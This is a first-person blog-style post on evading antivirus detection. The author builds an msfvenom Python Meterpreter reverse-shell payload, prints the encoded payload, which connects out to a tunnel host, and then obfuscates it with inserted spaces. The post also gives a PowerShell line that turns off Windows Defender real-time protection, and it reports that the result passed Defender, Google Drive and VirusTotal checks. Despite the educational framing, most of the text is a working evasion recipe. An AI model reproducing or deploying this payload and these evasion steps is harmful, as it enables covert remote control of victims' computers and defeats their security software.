This is a secret that I have to share to the public for educational purposes and for anti virus companies to take into consideration. All of my reverse shell experiments requires that I have to disable my firewall and antivirus so that my experiments will yield results because they were just mere to prove that software and methods work and so far I succeeded but I realized that it is still incomplete, I have mentioned in my previous post that a crypter like Shellter may be used to avoid anti virus detection so I tried it but the encrypted payload was detected by Windows Defender because Shellter is no longer being updated by its creators. I have not tried Veil as crypter but though my endless research, it has the same situation as Shellter. I want to do something better by avoiding anti virus detection. The crypter I have tried failed so I decided to use obfuscation method and I am so happy to announce with the latest update of Windows Defender, it was not able to detect the payload I created from MSFVenum(but I tweaked it a little bit), it was my own experiment only.
Windows Defender looks for hashes inside a file that matches their database of known threats, so what if I have access to that hashes and modify it a little bit and will only be restored during runtime. So I researched if the payload in msfvenum can be outputted to a python script and it really can by issuing the following command:
msfvenom -p python/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f raw -o payload.py
It created the following python script:
1 | exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')(aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJ2I3YzdmNTU0ODExMGU3LmxocnR1bm5lbC5saW5rJyw0NDMpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKHpsaWIuZGVjb21wcmVzcyhiYXNlNjQuYjY0ZGVjb2RlKGQpKSx7J3MnOnN9KQo=)[0])) |
This is a complete python script and can already be executed. The portion where the payload is the long encyrpted word where I suspect the hash is located). So I used PyInstaller to convert it to an executable file by typing the following:
pyinstaller --noconsole --onefile payload.py --nowindowed
Then I uploaded it to google drive, I could not send it via email(yahoo and gmail) because they can detect it as harmful file and these emails do not allow .exe file even if the file has no virus. I also tried facebook messenger and it did not also allowed the file to be sent because it detected that it has malicious content. I tried to change the extention from .exe to .zip file and send it to Facebook messenger, and I was surprised that it succeeded. But this is very impractical because you can not instruct your friend that he has to change it back to .exe file, it will still be detected by Windows Defender after conversion. So I succeeded in uploading the file to my google drive. I tried to download it to my other pc but that was the time when google detected that it was a virus, but still it has an option if I want to download it or not so I obviously continued downloading the file but when it reached 90% , Windows Defender stopped the download because it was a virus.
So basically I could not download the payload.
As stated in the second paragraph, I need to tweak the python script. I have to take out the encrypted word and assign it to a variable. I made a little change to the encrypted word by inserting several spaces randomly. The second command is to remove the spaces then compile it using pyinstaller then upload it to google drive and download it and I succeeded in downloading the payload without getting detected by Windows Defender or Google.
Here is the complete python script:
1 2 3 4 5 6 7 8 9 10 11 12 13 | import subprocess def run(self, cmd): completed = subprocess.run(["powershell", "-Command", cmd], capture_output=True) return completed if __name__ == '__main__': hello_command = "Set-MpPreference -DisableRealtimeMonitoring $true" #hello_info = run(hello_command) subprocess.run(["powershell", "-Command", hello_command], capture_output=True) codel = ' aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbi ByYW5nZSgxMCk6Cgl0cnk6CgkJ cz1zb2NrZXQuc29ja2V0KDIsc2 9ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJ2I3Yz dmNTU0ODExMGU3LmxocnR1b m5lbC5saW5rJyw0NDMpKQoJCWJyZWFrCglleGNl cHQ6CgkJdGltZS5zbGVlcCg1KQpsPX N0cnVjdC51bnBhY2soJz5JJyxzLnJlY3 YoNCkpWzBdCmQ9cy5yZWN2K GwpCndoaWxlIGxlbihkKTxsOgoJ ZCs9cy5yZWN2KGwtbGVuKGQpKQ pleGVjKHpsaWIuZGVjb21wcmVzcy hiYXNlNjQuYjY0ZGVjb2RlKGQp KSx7J3MnOnN9KQo=' codel.replace(" ","") exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')(codel)[0])) |
As an added bonus, I added a feature to disable the Windows Defender realtime protection before executing the payload. I was planning to disable the firewall but as of my writing, I have not implemented it yet because I was too excited to document what I have just achieved.
My experiment so far is based on my current installed anti virus software which comes pre installed on my pc. I think it is bundled with any lisenced Windows OS. As part of my testing phase, I uploaded the python script to virustotal.com to test if other anti viruses can detect it. AVG and Avast were able to detect it. I thought that the spaces I have added was not enough so I added some more spaces and uploaded it again to virustotal.com and finally it came out to be virus free.
To be continued...